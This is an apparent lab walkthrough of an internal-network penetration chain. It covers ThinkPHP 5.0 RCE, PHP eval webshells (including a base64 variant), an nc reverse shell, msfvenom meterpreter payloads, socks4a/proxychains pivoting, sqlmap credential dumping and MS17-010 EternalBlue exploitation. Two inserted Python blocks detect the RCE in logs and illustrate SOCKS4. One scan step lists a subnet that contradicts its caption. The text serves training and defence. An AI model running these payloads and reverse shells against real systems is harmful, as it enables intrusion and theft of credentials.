nmap scan
nmap -sV -p1-65535 192.168.1.135
![](https://upload-images.jianshu.io/upload_images/4664072-78e29cf593f003fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-57bd60159dfde305.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The target runs ThinkPHP 5.0.
Find a PoC and test it:
http://192.168.1.135/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
![](https://upload-images.jianshu.io/upload_images/4664072-c757b95937d28297.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.1.135/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > 1.php
![](https://upload-images.jianshu.io/upload_images/4664072-3d17a9a73c709e12.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Written successfully.
![](https://upload-images.jianshu.io/upload_images/4664072-5e848a07cff0a5a2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Apply escaping:
http://192.168.1.135/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" >2.php
![](https://upload-images.jianshu.io/upload_images/4664072-ddf2150ee7e7c7cc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Or use base64 encoding:
<?php @eval($_POST['cmd']);?>
encodes to (note: the string below decodes to the double-quoted `$_POST["cmd"]` form, while the URL that follows carries the single-quoted encoding)
PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=
http://192.168.1.103/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="| base64 -d > 3.php
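From the defender's side, the requests above leave a distinctive trace in the web server access log. The Python below is an added example, not code from the original post: it runs over constructed Apache-style log lines (embedded, not real traffic), flags the ThinkPHP 5.0.x invokefunction route, including percent-encoded variants, and then flags any later request to the file the `system()` payload wrote (function and sample names are hypothetical).

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (not from the original post): two invokefunction requests,
# one normal route, then a request to the file the second payload wrote.
SAMPLE_LOG = r'''
192.168.1.104 - - [10/Jan/2020:10:01:02 +0800] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 51234
192.168.1.104 - - [10/Jan/2020:10:01:09 +0800] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo+%22%3C%3Fphp+%40eval(%24_POST%5B%27cmd%27%5D)%3B%3F%3E%22+%3E+1.php HTTP/1.1" 200 12
192.168.1.50 - - [10/Jan/2020:10:02:00 +0800] "GET /index.php?s=/index/user/login HTTP/1.1" 200 2048
192.168.1.104 - - [10/Jan/2020:10:03:00 +0800] "POST /1.php HTTP/1.1" 200 87
'''

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)')
DROP_RE = re.compile(r'>\s*([\w./-]+\.php)')   # "echo ... > 1.php" inside a system() argument

def fully_decode(s: str) -> str:
    """Decode twice so double-encoded routes (%255Cthink) are caught as well."""
    return unquote_plus(unquote_plus(s))

def classify(target: str) -> list:
    """Reasons why one request target matches the ThinkPHP 5.0.x invokefunction RCE."""
    parts = urlsplit(target)
    query = {k: fully_decode(v[0]) for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    route = query.get('s', fully_decode(parts.path))   # route comes from s= or from PATH_INFO
    reasons = []
    if '\\' in route:                                  # namespace injection via controller name
        reasons.append('backslash in route: ' + route)
    if 'invokefunction' in route.lower():
        reasons.append('invokefunction dispatch')
    if query.get('function') in ('call_user_func_array', 'call_user_func') and any(k.startswith('vars[') for k in query):
        reasons.append('call_user_func_array with attacker-controlled vars')
    return reasons

def scan(log_text: str) -> list:
    """Flag RCE attempts, then any later request to a file those attempts wrote on disk."""
    alerts, dropped = [], set()
    for m in filter(None, map(LINE_RE.match, log_text.strip().splitlines())):
        target, reasons = m['target'], classify(m['target'])
        if reasons:
            for v in parse_qs(urlsplit(target).query).values():
                for name in DROP_RE.findall(fully_decode(v[0])):
                    dropped.add('/' + name.rsplit('/', 1)[-1])
        elif urlsplit(target).path in dropped:
            reasons = ['request to file written by earlier RCE (likely webshell)']
        if reasons:
            alerts.append({'ip': m['ip'], 'target': target, 'reasons': reasons})
    return alerts
```

Running `scan(SAMPLE_LOG)` yields three alerts: the two invokefunction requests and the later POST to `/1.php`; the normal `user/login` route is left alone.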
Reverse shell back to Kali:
nc 192.168.1.104 6666 -e /bin/bash
Upgrade to an interactive bash on Kali:
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-8b41019caf17f00f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
flag
![](https://upload-images.jianshu.io/upload_images/4664072-bc6cb19c477205fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8d9ea2d752f67ae9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-789497480d675e56.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Generate a payload with msfvenom:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=1234 -f elf >1.elf
Upload it with AntSword, then:
chmod 777 1.elf
./1.elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > run
![](https://upload-images.jianshu.io/upload_images/4664072-2f892c44e04d3ecd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ce6ddb0e97aa31d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Get the current subnets:
run get_local_subnets
![](https://upload-images.jianshu.io/upload_images/4664072-4a7af3822086ab99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Add a route:
run autoroute -s 192.168.22.0/24
run autoroute -p
![](https://upload-images.jianshu.io/upload_images/4664072-3ec876a1b8473f60.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Internal network scan:
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
![](https://upload-images.jianshu.io/upload_images/4664072-0dfdb1438a158cf4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Set up the socks4a proxy:
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
srvport => 2222
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
![](https://upload-images.jianshu.io/upload_images/4664072-0eaafcdbbbef01fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Edit the proxychains configuration:
vim /etc/proxychains.conf
socks4 192.168.1.128 2222
![](https://upload-images.jianshu.io/upload_images/4664072-ceadb9bc9506f30a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
proxychains nmap -Pn -sT 192.168.22.129
-Pn: skip host discovery and treat the target as up; ping probes are not relayed through the SOCKS proxy, so without this flag nmap would report the host as down.
-sT: full TCP connect() scan; proxychains can only relay complete TCP connections, so SYN (-sS) and other raw-packet scans do not work through the proxy.
![](https://upload-images.jianshu.io/upload_images/4664072-ff4ba0b08bb80ebf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
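The two flags above follow from what SOCKS4 can carry. As an added example that is not part of the original post, the Python below implements the SOCKS4/4a CONNECT request and the 8-byte reply that proxychains exchanges with msf's auxiliary/server/socks4a for every connection, and runs one round trip against an in-process stand-in proxy (`_fake_proxy`, a constructed stand-in, not the msf module) that grants only destinations inside the routed subnet.

```python
import socket
import struct
import threading

# Added example, not from the original post: the SOCKS4a CONNECT exchange proxychains performs
# against msf's socks4a server. SOCKS4 carries only TCP CONNECT/BIND, which is why nmap
# through it needs -sT and -Pn (no raw SYN packets, no ICMP).

def build_connect(dst: str, port: int, userid: bytes = b'') -> bytes:
    """VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL [, HOSTNAME, NUL for SOCKS4a]."""
    try:
        ip, tail = socket.inet_aton(dst), b''
    except OSError:                          # not an IPv4 literal: SOCKS4a hostname form
        ip, tail = b'\x00\x00\x00\x01', dst.encode() + b'\x00'
    return b'\x04\x01' + struct.pack('!H', port) + ip + userid + b'\x00' + tail

def parse_request(data: bytes):
    """Proxy side: decode a CONNECT request into (destination, port)."""
    vn, cd, port = data[0], data[1], struct.unpack('!H', data[2:4])[0]
    if vn != 4 or cd != 1:
        raise ValueError('not a SOCKS4 CONNECT')
    ip, rest = data[4:8], data[8:].split(b'\x00')   # rest = [userid, hostname, ...]
    if ip[:3] == b'\x00\x00\x00' and ip[3] != 0 and len(rest) > 1:
        return rest[1].decode(), port                # SOCKS4a: the proxy resolves the name
    return socket.inet_ntoa(ip), port

def parse_reply(data: bytes) -> bool:
    """Client side: the 8-byte reply; CD 90 = granted, 91..93 = refused."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError('malformed SOCKS4 reply')
    return data[1] == 90

def _fake_proxy(srv: socket.socket, routed_prefix: str):
    """Stand-in for the pivot: grant only destinations inside the routed subnet."""
    conn, _ = srv.accept()
    with conn:
        dst, _port = parse_request(conn.recv(512))
        conn.sendall(b'\x00' + (b'\x5a' if dst.startswith(routed_prefix) else b'\x5b') + b'\x00' * 6)

def connect_via_proxy(dst: str, port: int = 80, routed_prefix: str = '192.168.22.') -> bool:
    """One CONNECT through the fake proxy on localhost; True if the proxy granted it."""
    srv = socket.socket()
    srv.bind(('127.0.0.1', 0))
    srv.listen(1)
    threading.Thread(target=_fake_proxy, args=(srv, routed_prefix), daemon=True).start()
    with socket.create_connection(srv.getsockname()) as c:
        c.sendall(build_connect(dst, port))
        granted = parse_reply(c.recv(8))
    srv.close()
    return granted
```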
Open the site on port 80 through the proxy:
![](https://upload-images.jianshu.io/upload_images/4664072-622f0ba02fa39c0a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
proxychains dirb http://192.168.22.129
![](https://upload-images.jianshu.io/upload_images/4664072-f1e26b2947a36f8f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-39281c56802db920.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a8bc9dcca16f8524.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
SQL injection:
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword --dbs
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
admin | 46f94c8de14fb36680850768ff1b7f2a (123qwe)
Log in to the admin backend.
![](https://upload-images.jianshu.io/upload_images/4664072-a4fa80be8e032540.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Set up Proxifier.
Generate a payload with msfvenom:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=432 -f elf > 5.elf
This time the proxy uses bind_tcp, so Target2 is the listening side:
proxychains msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 432
msf5 exploit(multi/handler) > run
![](https://upload-images.jianshu.io/upload_images/4664072-3ecb67c943f5d7ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Get the current subnets:
run get_local_subnets
![](https://upload-images.jianshu.io/upload_images/4664072-3a9c3fbdc39874bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Add a route:
run autoroute -s 192.168.33.0/24
run autoroute -p
![](https://upload-images.jianshu.io/upload_images/4664072-b4d5b69575a316ce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2223
srvport => 2223
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 2.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
![](https://upload-images.jianshu.io/upload_images/4664072-a051fed2f4b43bf5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Edit the proxychains configuration:
vim /etc/proxychains.conf
socks4 127.0.0.1 2223
Probe the 192.168.33.0/24 segment:
use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
![](https://upload-images.jianshu.io/upload_images/4664072-3fff449e53e418dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port scan:
proxychains nmap -Pn -sT 192.168.33.33
![](https://upload-images.jianshu.io/upload_images/4664072-3522f762d7811858.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Ports 445 and 3389 are open.
auxiliary/scanner/smb/smb_version
![](https://upload-images.jianshu.io/upload_images/4664072-b4de36f13fdaaf1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
![](https://upload-images.jianshu.io/upload_images/4664072-1decb2c0779f8cc0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.33.33
rhost => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
![](https://upload-images.jianshu.io/upload_images/4664072-87f2b3dc64792376.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33
RHOST => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > run
Code page 65001 (UTF-8) fixes the garbled output:
chcp 65001
![](https://upload-images.jianshu.io/upload_images/4664072-f624de02e76ed6d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cb9673c16101104e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)